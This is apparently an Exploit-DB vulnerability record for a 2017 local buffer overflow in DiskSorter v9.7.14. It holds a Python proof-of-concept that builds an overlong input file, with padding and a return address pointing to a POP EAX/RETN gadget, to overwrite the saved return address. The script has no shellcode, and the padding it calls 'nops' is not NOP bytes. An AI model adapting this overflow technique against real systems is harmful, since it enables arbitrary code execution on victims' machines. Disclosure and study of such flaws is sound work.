Vendor: DiskSorter
By: n3ckD_
CVSS: 7,8 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: DiskSorter
Affected Version From: DiskSorter v9.7.14 (32-Bit)
Affected Version To: DiskSorter v9.7.14 (32-Bit)
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Enterprise SP1 (Build 7601)
Year: 2017

DiskSorter v9.7.14 – Input Directory Local Buffer Overflow – PoC

DiskSorter v9.7.14 (32-Bit) is vulnerable to a local buffer overflow when a user pastes the contents of poc.txt into the 'Inputs -> Add Input Directory' dialog. The overlong input overwrites the saved return address, which can be exploited to execute arbitrary code by replacing it with a pointer to the shellcode.

Mitigation:

Upgrade to the latest version of DiskSorter.

Exploit-DB raw data:

#!/usr/bin/python

######################################
#	Exploit Title:		DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
# 	Date: 				25 May 2017
# 	Exploit Author: 	n3ckD_
#	Vendor Homepage:	http://www.disksorter.com/
#	Software Link:		http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
#	Version:			Disk Sorter v9.7.14 (32-Bit)
#	Tested on:			Windows 7 Enterprise SP1 (Build 7601)
#	Usage:				Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
######################################

print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"

# in libspg:.text
# 10147C1C   58               POP EAX
# 10147C1D   C3               RETN
ret = "\x1c\x7c\x14\x10"

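# Layout of the pasted string: 48 bytes of padding, then 4048 'A' bytes,
# so ret lands at offset 4096, followed by the literal "MAGIC" and a newline.
nops = "\x47\x4F"*24
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"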

f = open("poc.txt","w")
f.write(buf)
f.close()